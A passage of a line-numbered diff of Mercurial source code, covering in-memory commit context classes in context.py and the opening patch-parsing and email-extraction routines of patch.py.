2262 man[f] = revlog.hash(self[f].data(), nullid, nullid)
2264 man[f] = revlog.hash(self[f].data(), nullid, nullid)
2263
2265
2264 for f in self._status.removed:
2266 for f in self._status.removed:
2265 if f in man:
2267 if f in man:
2266 del man[f]
2268 del man[f]
2267
2269
2268 return man
2270 return man
2269
2271
2270 @propertycache
2272 @propertycache
2271 def _status(self):
2273 def _status(self):
2272 """Calculate exact status from ``files`` specified at construction
2274 """Calculate exact status from ``files`` specified at construction
2273 """
2275 """
2274 man1 = self.p1().manifest()
2276 man1 = self.p1().manifest()
2275 p2 = self._parents[1]
2277 p2 = self._parents[1]
2276 # "1 < len(self._parents)" can't be used for checking
2278 # "1 < len(self._parents)" can't be used for checking
2277 # existence of the 2nd parent, because "memctx._parents" is
2279 # existence of the 2nd parent, because "memctx._parents" is
2278 # explicitly initialized by the list, of which length is 2.
2280 # explicitly initialized by the list, of which length is 2.
2279 if p2.node() != nullid:
2281 if p2.node() != nullid:
2280 man2 = p2.manifest()
2282 man2 = p2.manifest()
2281 managing = lambda f: f in man1 or f in man2
2283 managing = lambda f: f in man1 or f in man2
2282 else:
2284 else:
2283 managing = lambda f: f in man1
2285 managing = lambda f: f in man1
2284
2286
2285 modified, added, removed = [], [], []
2287 modified, added, removed = [], [], []
2286 for f in self._files:
2288 for f in self._files:
2287 if not managing(f):
2289 if not managing(f):
2288 added.append(f)
2290 added.append(f)
2289 elif self[f]:
2291 elif self[f]:
2290 modified.append(f)
2292 modified.append(f)
2291 else:
2293 else:
2292 removed.append(f)
2294 removed.append(f)
2293
2295
2294 return scmutil.status(modified, added, removed, [], [], [], [])
2296 return scmutil.status(modified, added, removed, [], [], [], [])
2295
2297
2296 class memfilectx(committablefilectx):
2298 class memfilectx(committablefilectx):
2297 """memfilectx represents an in-memory file to commit.
2299 """memfilectx represents an in-memory file to commit.
2298
2300
2299 See memctx and committablefilectx for more details.
2301 See memctx and committablefilectx for more details.
2300 """
2302 """
2301 def __init__(self, repo, changectx, path, data, islink=False,
2303 def __init__(self, repo, changectx, path, data, islink=False,
2302 isexec=False, copied=None):
2304 isexec=False, copied=None):
2303 """
2305 """
2304 path is the normalized file path relative to repository root.
2306 path is the normalized file path relative to repository root.
2305 data is the file content as a string.
2307 data is the file content as a string.
2306 islink is True if the file is a symbolic link.
2308 islink is True if the file is a symbolic link.
2307 isexec is True if the file is executable.
2309 isexec is True if the file is executable.
2308 copied is the source file path if current file was copied in the
2310 copied is the source file path if current file was copied in the
2309 revision being committed, or None."""
2311 revision being committed, or None."""
2310 super(memfilectx, self).__init__(repo, path, None, changectx)
2312 super(memfilectx, self).__init__(repo, path, None, changectx)
2311 self._data = data
2313 self._data = data
2312 self._flags = (islink and 'l' or '') + (isexec and 'x' or '')
2314 self._flags = (islink and 'l' or '') + (isexec and 'x' or '')
2313 self._copied = None
2315 self._copied = None
2314 if copied:
2316 if copied:
2315 self._copied = (copied, nullid)
2317 self._copied = (copied, nullid)
2316
2318
2317 def data(self):
2319 def data(self):
2318 return self._data
2320 return self._data
2319
2321
2320 def remove(self, ignoremissing=False):
2322 def remove(self, ignoremissing=False):
2321 """wraps unlink for a repo's working directory"""
2323 """wraps unlink for a repo's working directory"""
2322 # need to figure out what to do here
2324 # need to figure out what to do here
2323 del self._changectx[self._path]
2325 del self._changectx[self._path]
2324
2326
2325 def write(self, data, flags, **kwargs):
2327 def write(self, data, flags, **kwargs):
2326 """wraps repo.wwrite"""
2328 """wraps repo.wwrite"""
2327 self._data = data
2329 self._data = data
2328
2330
2329 class overlayfilectx(committablefilectx):
2331 class overlayfilectx(committablefilectx):
2330 """Like memfilectx but take an original filectx and optional parameters to
2332 """Like memfilectx but take an original filectx and optional parameters to
2331 override parts of it. This is useful when fctx.data() is expensive (i.e.
2333 override parts of it. This is useful when fctx.data() is expensive (i.e.
2332 flag processor is expensive) and raw data, flags, and filenode could be
2334 flag processor is expensive) and raw data, flags, and filenode could be
2333 reused (ex. rebase or mode-only amend a REVIDX_EXTSTORED file).
2335 reused (ex. rebase or mode-only amend a REVIDX_EXTSTORED file).
2334 """
2336 """
2335
2337
2336 def __init__(self, originalfctx, datafunc=None, path=None, flags=None,
2338 def __init__(self, originalfctx, datafunc=None, path=None, flags=None,
2337 copied=None, ctx=None):
2339 copied=None, ctx=None):
2338 """originalfctx: filecontext to duplicate
2340 """originalfctx: filecontext to duplicate
2339
2341
2340 datafunc: None or a function to override data (file content). It is a
2342 datafunc: None or a function to override data (file content). It is a
2341 function to be lazy. path, flags, copied, ctx: None or overridden value
2343 function to be lazy. path, flags, copied, ctx: None or overridden value
2342
2344
2343 copied could be (path, rev), or False. copied could also be just path,
2345 copied could be (path, rev), or False. copied could also be just path,
2344 and will be converted to (path, nullid). This simplifies some callers.
2346 and will be converted to (path, nullid). This simplifies some callers.
2345 """
2347 """
2346
2348
2347 if path is None:
2349 if path is None:
2348 path = originalfctx.path()
2350 path = originalfctx.path()
2349 if ctx is None:
2351 if ctx is None:
2350 ctx = originalfctx.changectx()
2352 ctx = originalfctx.changectx()
2351 ctxmatch = lambda: True
2353 ctxmatch = lambda: True
2352 else:
2354 else:
2353 ctxmatch = lambda: ctx == originalfctx.changectx()
2355 ctxmatch = lambda: ctx == originalfctx.changectx()
2354
2356
2355 repo = originalfctx.repo()
2357 repo = originalfctx.repo()
2356 flog = originalfctx.filelog()
2358 flog = originalfctx.filelog()
2357 super(overlayfilectx, self).__init__(repo, path, flog, ctx)
2359 super(overlayfilectx, self).__init__(repo, path, flog, ctx)
2358
2360
2359 if copied is None:
2361 if copied is None:
2360 copied = originalfctx.renamed()
2362 copied = originalfctx.renamed()
2361 copiedmatch = lambda: True
2363 copiedmatch = lambda: True
2362 else:
2364 else:
2363 if copied and not isinstance(copied, tuple):
2365 if copied and not isinstance(copied, tuple):
2364 # repo._filecommit will recalculate copyrev so nullid is okay
2366 # repo._filecommit will recalculate copyrev so nullid is okay
2365 copied = (copied, nullid)
2367 copied = (copied, nullid)
2366 copiedmatch = lambda: copied == originalfctx.renamed()
2368 copiedmatch = lambda: copied == originalfctx.renamed()
2367
2369
2368 # When data, copied (could affect data), ctx (could affect filelog
2370 # When data, copied (could affect data), ctx (could affect filelog
2369 # parents) are not overridden, rawdata, rawflags, and filenode may be
2371 # parents) are not overridden, rawdata, rawflags, and filenode may be
2370 # reused (repo._filecommit should double check filelog parents).
2372 # reused (repo._filecommit should double check filelog parents).
2371 #
2373 #
2372 # path, flags are not hashed in filelog (but in manifestlog) so they do
2374 # path, flags are not hashed in filelog (but in manifestlog) so they do
2373 # not affect reusable here.
2375 # not affect reusable here.
2374 #
2376 #
2375 # If ctx or copied is overridden to a same value with originalfctx,
2377 # If ctx or copied is overridden to a same value with originalfctx,
2376 # still consider it's reusable. originalfctx.renamed() may be a bit
2378 # still consider it's reusable. originalfctx.renamed() may be a bit
2377 # expensive so it's not called unless necessary. Assuming datafunc is
2379 # expensive so it's not called unless necessary. Assuming datafunc is
2378 # always expensive, do not call it for this "reusable" test.
2380 # always expensive, do not call it for this "reusable" test.
2379 reusable = datafunc is None and ctxmatch() and copiedmatch()
2381 reusable = datafunc is None and ctxmatch() and copiedmatch()
2380
2382
2381 if datafunc is None:
2383 if datafunc is None:
2382 datafunc = originalfctx.data
2384 datafunc = originalfctx.data
2383 if flags is None:
2385 if flags is None:
2384 flags = originalfctx.flags()
2386 flags = originalfctx.flags()
2385
2387
2386 self._datafunc = datafunc
2388 self._datafunc = datafunc
2387 self._flags = flags
2389 self._flags = flags
2388 self._copied = copied
2390 self._copied = copied
2389
2391
2390 if reusable:
2392 if reusable:
2391 # copy extra fields from originalfctx
2393 # copy extra fields from originalfctx
2392 attrs = ['rawdata', 'rawflags', '_filenode', '_filerev']
2394 attrs = ['rawdata', 'rawflags', '_filenode', '_filerev']
2393 for attr_ in attrs:
2395 for attr_ in attrs:
2394 if util.safehasattr(originalfctx, attr_):
2396 if util.safehasattr(originalfctx, attr_):
2395 setattr(self, attr_, getattr(originalfctx, attr_))
2397 setattr(self, attr_, getattr(originalfctx, attr_))
2396
2398
2397 def data(self):
2399 def data(self):
2398 return self._datafunc()
2400 return self._datafunc()
2399
2401
2400 class metadataonlyctx(committablectx):
2402 class metadataonlyctx(committablectx):
2401 """Like memctx but it's reusing the manifest of different commit.
2403 """Like memctx but it's reusing the manifest of different commit.
2402 Intended to be used by lightweight operations that are creating
2404 Intended to be used by lightweight operations that are creating
2403 metadata-only changes.
2405 metadata-only changes.
2404
2406
2405 Revision information is supplied at initialization time. 'repo' is the
2407 Revision information is supplied at initialization time. 'repo' is the
2406 current localrepo, 'ctx' is original revision which manifest we're reuisng
2408 current localrepo, 'ctx' is original revision which manifest we're reuisng
2407 'parents' is a sequence of two parent revisions identifiers (pass None for
2409 'parents' is a sequence of two parent revisions identifiers (pass None for
2408 every missing parent), 'text' is the commit.
2410 every missing parent), 'text' is the commit.
2409
2411
2410 user receives the committer name and defaults to current repository
2412 user receives the committer name and defaults to current repository
2411 username, date is the commit date in any format supported by
2413 username, date is the commit date in any format supported by
2412 dateutil.parsedate() and defaults to current date, extra is a dictionary of
2414 dateutil.parsedate() and defaults to current date, extra is a dictionary of
2413 metadata or is left empty.
2415 metadata or is left empty.
2414 """
2416 """
2415 def __init__(self, repo, originalctx, parents=None, text=None, user=None,
2417 def __init__(self, repo, originalctx, parents=None, text=None, user=None,
2416 date=None, extra=None, editor=False):
2418 date=None, extra=None, editor=False):
2417 if text is None:
2419 if text is None:
2418 text = originalctx.description()
2420 text = originalctx.description()
2419 super(metadataonlyctx, self).__init__(repo, text, user, date, extra)
2421 super(metadataonlyctx, self).__init__(repo, text, user, date, extra)
2420 self._rev = None
2422 self._rev = None
2421 self._node = None
2423 self._node = None
2422 self._originalctx = originalctx
2424 self._originalctx = originalctx
2423 self._manifestnode = originalctx.manifestnode()
2425 self._manifestnode = originalctx.manifestnode()
2424 if parents is None:
2426 if parents is None:
2425 parents = originalctx.parents()
2427 parents = originalctx.parents()
2426 else:
2428 else:
2427 parents = [repo[p] for p in parents if p is not None]
2429 parents = [repo[p] for p in parents if p is not None]
2428 parents = parents[:]
2430 parents = parents[:]
2429 while len(parents) < 2:
2431 while len(parents) < 2:
2430 parents.append(repo[nullid])
2432 parents.append(repo[nullid])
2431 p1, p2 = self._parents = parents
2433 p1, p2 = self._parents = parents
2432
2434
2433 # sanity check to ensure that the reused manifest parents are
2435 # sanity check to ensure that the reused manifest parents are
2434 # manifests of our commit parents
2436 # manifests of our commit parents
2435 mp1, mp2 = self.manifestctx().parents
2437 mp1, mp2 = self.manifestctx().parents
2436 if p1 != nullid and p1.manifestnode() != mp1:
2438 if p1 != nullid and p1.manifestnode() != mp1:
2437 raise RuntimeError('can\'t reuse the manifest: '
2439 raise RuntimeError('can\'t reuse the manifest: '
2438 'its p1 doesn\'t match the new ctx p1')
2440 'its p1 doesn\'t match the new ctx p1')
2439 if p2 != nullid and p2.manifestnode() != mp2:
2441 if p2 != nullid and p2.manifestnode() != mp2:
2440 raise RuntimeError('can\'t reuse the manifest: '
2442 raise RuntimeError('can\'t reuse the manifest: '
2441 'its p2 doesn\'t match the new ctx p2')
2443 'its p2 doesn\'t match the new ctx p2')
2442
2444
2443 self._files = originalctx.files()
2445 self._files = originalctx.files()
2444 self.substate = {}
2446 self.substate = {}
2445
2447
2446 if editor:
2448 if editor:
2447 self._text = editor(self._repo, self, [])
2449 self._text = editor(self._repo, self, [])
2448 self._repo.savecommitmessage(self._text)
2450 self._repo.savecommitmessage(self._text)
2449
2451
2450 def manifestnode(self):
2452 def manifestnode(self):
2451 return self._manifestnode
2453 return self._manifestnode
2452
2454
2453 @property
2455 @property
2454 def _manifestctx(self):
2456 def _manifestctx(self):
2455 return self._repo.manifestlog[self._manifestnode]
2457 return self._repo.manifestlog[self._manifestnode]
2456
2458
2457 def filectx(self, path, filelog=None):
2459 def filectx(self, path, filelog=None):
2458 return self._originalctx.filectx(path, filelog=filelog)
2460 return self._originalctx.filectx(path, filelog=filelog)
2459
2461
2460 def commit(self):
2462 def commit(self):
2461 """commit context to the repo"""
2463 """commit context to the repo"""
2462 return self._repo.commitctx(self)
2464 return self._repo.commitctx(self)
2463
2465
2464 @property
2466 @property
2465 def _manifest(self):
2467 def _manifest(self):
2466 return self._originalctx.manifest()
2468 return self._originalctx.manifest()
2467
2469
2468 @propertycache
2470 @propertycache
2469 def _status(self):
2471 def _status(self):
2470 """Calculate exact status from ``files`` specified in the ``origctx``
2472 """Calculate exact status from ``files`` specified in the ``origctx``
2471 and parents manifests.
2473 and parents manifests.
2472 """
2474 """
2473 man1 = self.p1().manifest()
2475 man1 = self.p1().manifest()
2474 p2 = self._parents[1]
2476 p2 = self._parents[1]
2475 # "1 < len(self._parents)" can't be used for checking
2477 # "1 < len(self._parents)" can't be used for checking
2476 # existence of the 2nd parent, because "metadataonlyctx._parents" is
2478 # existence of the 2nd parent, because "metadataonlyctx._parents" is
2477 # explicitly initialized by the list, of which length is 2.
2479 # explicitly initialized by the list, of which length is 2.
2478 if p2.node() != nullid:
2480 if p2.node() != nullid:
2479 man2 = p2.manifest()
2481 man2 = p2.manifest()
2480 managing = lambda f: f in man1 or f in man2
2482 managing = lambda f: f in man1 or f in man2
2481 else:
2483 else:
2482 managing = lambda f: f in man1
2484 managing = lambda f: f in man1
2483
2485
2484 modified, added, removed = [], [], []
2486 modified, added, removed = [], [], []
2485 for f in self._files:
2487 for f in self._files:
2486 if not managing(f):
2488 if not managing(f):
2487 added.append(f)
2489 added.append(f)
2488 elif f in self:
2490 elif f in self:
2489 modified.append(f)
2491 modified.append(f)
2490 else:
2492 else:
2491 removed.append(f)
2493 removed.append(f)
2492
2494
2493 return scmutil.status(modified, added, removed, [], [], [], [])
2495 return scmutil.status(modified, added, removed, [], [], [], [])
2494
2496
2495 class arbitraryfilectx(object):
2497 class arbitraryfilectx(object):
2496 """Allows you to use filectx-like functions on a file in an arbitrary
2498 """Allows you to use filectx-like functions on a file in an arbitrary
2497 location on disk, possibly not in the working directory.
2499 location on disk, possibly not in the working directory.
2498 """
2500 """
2499 def __init__(self, path, repo=None):
2501 def __init__(self, path, repo=None):
2500 # Repo is optional because contrib/simplemerge uses this class.
2502 # Repo is optional because contrib/simplemerge uses this class.
2501 self._repo = repo
2503 self._repo = repo
2502 self._path = path
2504 self._path = path
2503
2505
2504 def cmp(self, fctx):
2506 def cmp(self, fctx):
2505 # filecmp follows symlinks whereas `cmp` should not, so skip the fast
2507 # filecmp follows symlinks whereas `cmp` should not, so skip the fast
2506 # path if either side is a symlink.
2508 # path if either side is a symlink.
2507 symlinks = ('l' in self.flags() or 'l' in fctx.flags())
2509 symlinks = ('l' in self.flags() or 'l' in fctx.flags())
2508 if not symlinks and isinstance(fctx, workingfilectx) and self._repo:
2510 if not symlinks and isinstance(fctx, workingfilectx) and self._repo:
2509 # Add a fast-path for merge if both sides are disk-backed.
2511 # Add a fast-path for merge if both sides are disk-backed.
2510 # Note that filecmp uses the opposite return values (True if same)
2512 # Note that filecmp uses the opposite return values (True if same)
2511 # from our cmp functions (True if different).
2513 # from our cmp functions (True if different).
2512 return not filecmp.cmp(self.path(), self._repo.wjoin(fctx.path()))
2514 return not filecmp.cmp(self.path(), self._repo.wjoin(fctx.path()))
2513 return self.data() != fctx.data()
2515 return self.data() != fctx.data()
2514
2516
2515 def path(self):
2517 def path(self):
2516 return self._path
2518 return self._path
2517
2519
2518 def flags(self):
2520 def flags(self):
2519 return ''
2521 return ''
2520
2522
2521 def data(self):
2523 def data(self):
2522 return util.readfile(self._path)
2524 return util.readfile(self._path)
2523
2525
2524 def decodeddata(self):
2526 def decodeddata(self):
2525 with open(self._path, "rb") as f:
2527 with open(self._path, "rb") as f:
2526 return f.read()
2528 return f.read()
2527
2529
2528 def remove(self):
2530 def remove(self):
2529 util.unlink(self._path)
2531 util.unlink(self._path)
2530
2532
2531 def write(self, data, flags, **kwargs):
2533 def write(self, data, flags, **kwargs):
2532 assert not flags
2534 assert not flags
2533 with open(self._path, "w") as f:
2535 with open(self._path, "w") as f:
2534 f.write(data)
2536 f.write(data)
@@ -1,2950 +1,2951 b''
1 # patch.py - patch file parsing routines
1 # patch.py - patch file parsing routines
2 #
2 #
3 # Copyright 2006 Brendan Cully <brendan@kublai.com>
3 # Copyright 2006 Brendan Cully <brendan@kublai.com>
4 # Copyright 2007 Chris Mason <chris.mason@oracle.com>
4 # Copyright 2007 Chris Mason <chris.mason@oracle.com>
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8
8
9 from __future__ import absolute_import, print_function
9 from __future__ import absolute_import, print_function
10
10
11 import collections
11 import collections
12 import contextlib
12 import contextlib
13 import copy
13 import copy
14 import email
14 import email
15 import errno
15 import errno
16 import hashlib
16 import hashlib
17 import os
17 import os
18 import posixpath
18 import posixpath
19 import re
19 import re
20 import shutil
20 import shutil
21 import zlib
21 import zlib
22
22
23 from .i18n import _
23 from .i18n import _
24 from .node import (
24 from .node import (
25 hex,
25 hex,
26 short,
26 short,
27 )
27 )
28 from . import (
28 from . import (
29 copies,
29 copies,
30 diffhelper,
30 diffhelper,
31 encoding,
31 encoding,
32 error,
32 error,
33 mail,
33 mail,
34 mdiff,
34 mdiff,
35 pathutil,
35 pathutil,
36 pycompat,
36 pycompat,
37 scmutil,
37 scmutil,
38 similar,
38 similar,
39 util,
39 util,
40 vfs as vfsmod,
40 vfs as vfsmod,
41 )
41 )
42 from .utils import (
42 from .utils import (
43 dateutil,
43 dateutil,
44 procutil,
44 procutil,
45 stringutil,
45 stringutil,
46 )
46 )
47
47
48 stringio = util.stringio
48 stringio = util.stringio
49
49
50 gitre = re.compile(br'diff --git a/(.*) b/(.*)')
50 gitre = re.compile(br'diff --git a/(.*) b/(.*)')
51 tabsplitter = re.compile(br'(\t+|[^\t]+)')
51 tabsplitter = re.compile(br'(\t+|[^\t]+)')
52 wordsplitter = re.compile(br'(\t+| +|[a-zA-Z0-9_\x80-\xff]+|'
52 wordsplitter = re.compile(br'(\t+| +|[a-zA-Z0-9_\x80-\xff]+|'
53 b'[^ \ta-zA-Z0-9_\x80-\xff])')
53 b'[^ \ta-zA-Z0-9_\x80-\xff])')
54
54
55 PatchError = error.PatchError
55 PatchError = error.PatchError
56
56
57 # public functions
57 # public functions
58
58
59 def split(stream):
59 def split(stream):
60 '''return an iterator of individual patches from a stream'''
60 '''return an iterator of individual patches from a stream'''
61 def isheader(line, inheader):
61 def isheader(line, inheader):
62 if inheader and line.startswith((' ', '\t')):
62 if inheader and line.startswith((' ', '\t')):
63 # continuation
63 # continuation
64 return True
64 return True
65 if line.startswith((' ', '-', '+')):
65 if line.startswith((' ', '-', '+')):
66 # diff line - don't check for header pattern in there
66 # diff line - don't check for header pattern in there
67 return False
67 return False
68 l = line.split(': ', 1)
68 l = line.split(': ', 1)
69 return len(l) == 2 and ' ' not in l[0]
69 return len(l) == 2 and ' ' not in l[0]
70
70
71 def chunk(lines):
71 def chunk(lines):
72 return stringio(''.join(lines))
72 return stringio(''.join(lines))
73
73
74 def hgsplit(stream, cur):
74 def hgsplit(stream, cur):
75 inheader = True
75 inheader = True
76
76
77 for line in stream:
77 for line in stream:
78 if not line.strip():
78 if not line.strip():
79 inheader = False
79 inheader = False
80 if not inheader and line.startswith('# HG changeset patch'):
80 if not inheader and line.startswith('# HG changeset patch'):
81 yield chunk(cur)
81 yield chunk(cur)
82 cur = []
82 cur = []
83 inheader = True
83 inheader = True
84
84
85 cur.append(line)
85 cur.append(line)
86
86
87 if cur:
87 if cur:
88 yield chunk(cur)
88 yield chunk(cur)
89
89
90 def mboxsplit(stream, cur):
90 def mboxsplit(stream, cur):
91 for line in stream:
91 for line in stream:
92 if line.startswith('From '):
92 if line.startswith('From '):
93 for c in split(chunk(cur[1:])):
93 for c in split(chunk(cur[1:])):
94 yield c
94 yield c
95 cur = []
95 cur = []
96
96
97 cur.append(line)
97 cur.append(line)
98
98
99 if cur:
99 if cur:
100 for c in split(chunk(cur[1:])):
100 for c in split(chunk(cur[1:])):
101 yield c
101 yield c
102
102
103 def mimesplit(stream, cur):
103 def mimesplit(stream, cur):
104 def msgfp(m):
104 def msgfp(m):
105 fp = stringio()
105 fp = stringio()
106 g = email.Generator.Generator(fp, mangle_from_=False)
106 g = email.Generator.Generator(fp, mangle_from_=False)
107 g.flatten(m)
107 g.flatten(m)
108 fp.seek(0)
108 fp.seek(0)
109 return fp
109 return fp
110
110
111 for line in stream:
111 for line in stream:
112 cur.append(line)
112 cur.append(line)
113 c = chunk(cur)
113 c = chunk(cur)
114
114
115 m = mail.parse(c)
115 m = mail.parse(c)
116 if not m.is_multipart():
116 if not m.is_multipart():
117 yield msgfp(m)
117 yield msgfp(m)
118 else:
118 else:
119 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
119 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
120 for part in m.walk():
120 for part in m.walk():
121 ct = part.get_content_type()
121 ct = part.get_content_type()
122 if ct not in ok_types:
122 if ct not in ok_types:
123 continue
123 continue
124 yield msgfp(part)
124 yield msgfp(part)
125
125
126 def headersplit(stream, cur):
126 def headersplit(stream, cur):
127 inheader = False
127 inheader = False
128
128
129 for line in stream:
129 for line in stream:
130 if not inheader and isheader(line, inheader):
130 if not inheader and isheader(line, inheader):
131 yield chunk(cur)
131 yield chunk(cur)
132 cur = []
132 cur = []
133 inheader = True
133 inheader = True
134 if inheader and not isheader(line, inheader):
134 if inheader and not isheader(line, inheader):
135 inheader = False
135 inheader = False
136
136
137 cur.append(line)
137 cur.append(line)
138
138
139 if cur:
139 if cur:
140 yield chunk(cur)
140 yield chunk(cur)
141
141
142 def remainder(cur):
142 def remainder(cur):
143 yield chunk(cur)
143 yield chunk(cur)
144
144
145 class fiter(object):
145 class fiter(object):
146 def __init__(self, fp):
146 def __init__(self, fp):
147 self.fp = fp
147 self.fp = fp
148
148
149 def __iter__(self):
149 def __iter__(self):
150 return self
150 return self
151
151
152 def next(self):
152 def next(self):
153 l = self.fp.readline()
153 l = self.fp.readline()
154 if not l:
154 if not l:
155 raise StopIteration
155 raise StopIteration
156 return l
156 return l
157
157
158 __next__ = next
158 __next__ = next
159
159
160 inheader = False
160 inheader = False
161 cur = []
161 cur = []
162
162
163 mimeheaders = ['content-type']
163 mimeheaders = ['content-type']
164
164
165 if not util.safehasattr(stream, 'next'):
165 if not util.safehasattr(stream, 'next'):
166 # http responses, for example, have readline but not next
166 # http responses, for example, have readline but not next
167 stream = fiter(stream)
167 stream = fiter(stream)
168
168
169 for line in stream:
169 for line in stream:
170 cur.append(line)
170 cur.append(line)
171 if line.startswith('# HG changeset patch'):
171 if line.startswith('# HG changeset patch'):
172 return hgsplit(stream, cur)
172 return hgsplit(stream, cur)
173 elif line.startswith('From '):
173 elif line.startswith('From '):
174 return mboxsplit(stream, cur)
174 return mboxsplit(stream, cur)
175 elif isheader(line, inheader):
175 elif isheader(line, inheader):
176 inheader = True
176 inheader = True
177 if line.split(':', 1)[0].lower() in mimeheaders:
177 if line.split(':', 1)[0].lower() in mimeheaders:
178 # let email parser handle this
178 # let email parser handle this
179 return mimesplit(stream, cur)
179 return mimesplit(stream, cur)
180 elif line.startswith('--- ') and inheader:
180 elif line.startswith('--- ') and inheader:
181 # No evil headers seen by diff start, split by hand
181 # No evil headers seen by diff start, split by hand
182 return headersplit(stream, cur)
182 return headersplit(stream, cur)
183 # Not enough info, keep reading
183 # Not enough info, keep reading
184
184
185 # if we are here, we have a very plain patch
185 # if we are here, we have a very plain patch
186 return remainder(cur)
186 return remainder(cur)
187
187
188 ## Some facility for extensible patch parsing:
188 ## Some facility for extensible patch parsing:
189 # list of pairs ("header to match", "data key")
189 # list of pairs ("header to match", "data key")
190 patchheadermap = [('Date', 'date'),
190 patchheadermap = [('Date', 'date'),
191 ('Branch', 'branch'),
191 ('Branch', 'branch'),
192 ('Node ID', 'nodeid'),
192 ('Node ID', 'nodeid'),
193 ]
193 ]
194
194
195 @contextlib.contextmanager
195 @contextlib.contextmanager
196 def extract(ui, fileobj):
196 def extract(ui, fileobj):
197 '''extract patch from data read from fileobj.
197 '''extract patch from data read from fileobj.
198
198
199 patch can be a normal patch or contained in an email message.
199 patch can be a normal patch or contained in an email message.
200
200
201 return a dictionary. Standard keys are:
201 return a dictionary. Standard keys are:
202 - filename,
202 - filename,
203 - message,
203 - message,
204 - user,
204 - user,
205 - date,
205 - date,
206 - branch,
206 - branch,
207 - node,
207 - node,
208 - p1,
208 - p1,
209 - p2.
209 - p2.
210 Any item can be missing from the dictionary. If filename is missing,
210 Any item can be missing from the dictionary. If filename is missing,
211 fileobj did not contain a patch. Caller must unlink filename when done.'''
211 fileobj did not contain a patch. Caller must unlink filename when done.'''
212
212
213 fd, tmpname = pycompat.mkstemp(prefix='hg-patch-')
213 fd, tmpname = pycompat.mkstemp(prefix='hg-patch-')
214 tmpfp = os.fdopen(fd, r'wb')
214 tmpfp = os.fdopen(fd, r'wb')
215 try:
215 try:
216 yield _extract(ui, fileobj, tmpname, tmpfp)
216 yield _extract(ui, fileobj, tmpname, tmpfp)
217 finally:
217 finally:
218 tmpfp.close()
218 tmpfp.close()
219 os.unlink(tmpname)
219 os.unlink(tmpname)
220
220
221 def _extract(ui, fileobj, tmpname, tmpfp):
221 def _extract(ui, fileobj, tmpname, tmpfp):
222
222
223 # attempt to detect the start of a patch
223 # attempt to detect the start of a patch
224 # (this heuristic is borrowed from quilt)
224 # (this heuristic is borrowed from quilt)
225 diffre = re.compile(br'^(?:Index:[ \t]|diff[ \t]-|RCS file: |'
225 diffre = re.compile(br'^(?:Index:[ \t]|diff[ \t]-|RCS file: |'
226 br'retrieving revision [0-9]+(\.[0-9]+)*$|'
226 br'retrieving revision [0-9]+(\.[0-9]+)*$|'
227 br'---[ \t].*?^\+\+\+[ \t]|'
227 br'---[ \t].*?^\+\+\+[ \t]|'
228 br'\*\*\*[ \t].*?^---[ \t])',
228 br'\*\*\*[ \t].*?^---[ \t])',
229 re.MULTILINE | re.DOTALL)
229 re.MULTILINE | re.DOTALL)
230
230
231 data = {}
231 data = {}
232
232
233 msg = mail.parse(fileobj)
233 msg = mail.parse(fileobj)
234
234
235 subject = msg[r'Subject'] and mail.headdecode(msg[r'Subject'])
235 subject = msg[r'Subject'] and mail.headdecode(msg[r'Subject'])
236 data['user'] = msg[r'From'] and mail.headdecode(msg[r'From'])
236 data['user'] = msg[r'From'] and mail.headdecode(msg[r'From'])
237 if not subject and not data['user']:
237 if not subject and not data['user']:
238 # Not an email, restore parsed headers if any
238 # Not an email, restore parsed headers if any
239 subject = '\n'.join(': '.join(map(encoding.strtolocal, h))
239 subject = '\n'.join(': '.join(map(encoding.strtolocal, h))
240 for h in msg.items()) + '\n'
240 for h in msg.items()) + '\n'
241
241
242 # should try to parse msg['Date']
242 # should try to parse msg['Date']
243 parents = []
243 parents = []
244
244
245 if subject:
245 if subject:
246 if subject.startswith('[PATCH'):
246 if subject.startswith('[PATCH'):
247 pend = subject.find(']')
247 pend = subject.find(']')
248 if pend >= 0:
248 if pend >= 0:
249 subject = subject[pend + 1:].lstrip()
249 subject = subject[pend + 1:].lstrip()
250 subject = re.sub(br'\n[ \t]+', ' ', subject)
250 subject = re.sub(br'\n[ \t]+', ' ', subject)
251 ui.debug('Subject: %s\n' % subject)
251 ui.debug('Subject: %s\n' % subject)
252 if data['user']:
252 if data['user']:
253 ui.debug('From: %s\n' % data['user'])
253 ui.debug('From: %s\n' % data['user'])
254 diffs_seen = 0
254 diffs_seen = 0
255 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
255 ok_types = ('text/plain', 'text/x-diff', 'text/x-patch')
256 message = ''
256 message = ''
257 for part in msg.walk():
257 for part in msg.walk():
258 content_type = pycompat.bytestr(part.get_content_type())
258 content_type = pycompat.bytestr(part.get_content_type())
259 ui.debug('Content-Type: %s\n' % content_type)
259 ui.debug('Content-Type: %s\n' % content_type)
260 if content_type not in ok_types:
260 if content_type not in ok_types:
261 continue
261 continue
262 payload = part.get_payload(decode=True)
262 payload = part.get_payload(decode=True)
263 m = diffre.search(payload)
263 m = diffre.search(payload)
264 if m:
264 if m:
265 hgpatch = False
265 hgpatch = False
266 hgpatchheader = False
266 hgpatchheader = False
267 ignoretext = False
267 ignoretext = False
268
268
269 ui.debug('found patch at byte %d\n' % m.start(0))
269 ui.debug('found patch at byte %d\n' % m.start(0))
270 diffs_seen += 1
270 diffs_seen += 1
271 cfp = stringio()
271 cfp = stringio()
272 for line in payload[:m.start(0)].splitlines():
272 for line in payload[:m.start(0)].splitlines():
273 if line.startswith('# HG changeset patch') and not hgpatch:
273 if line.startswith('# HG changeset patch') and not hgpatch:
274 ui.debug('patch generated by hg export\n')
274 ui.debug('patch generated by hg export\n')
275 hgpatch = True
275 hgpatch = True
276 hgpatchheader = True
276 hgpatchheader = True
277 # drop earlier commit message content
277 # drop earlier commit message content
278 cfp.seek(0)
278 cfp.seek(0)
279 cfp.truncate()
279 cfp.truncate()
280 subject = None
280 subject = None
281 elif hgpatchheader:
281 elif hgpatchheader:
282 if line.startswith('# User '):
282 if line.startswith('# User '):
283 data['user'] = line[7:]
283 data['user'] = line[7:]
284 ui.debug('From: %s\n' % data['user'])
284 ui.debug('From: %s\n' % data['user'])
285 elif line.startswith("# Parent "):
285 elif line.startswith("# Parent "):
286 parents.append(line[9:].lstrip())
286 parents.append(line[9:].lstrip())
287 elif line.startswith("# "):
287 elif line.startswith("# "):
288 for header, key in patchheadermap:
288 for header, key in patchheadermap:
289 prefix = '# %s ' % header
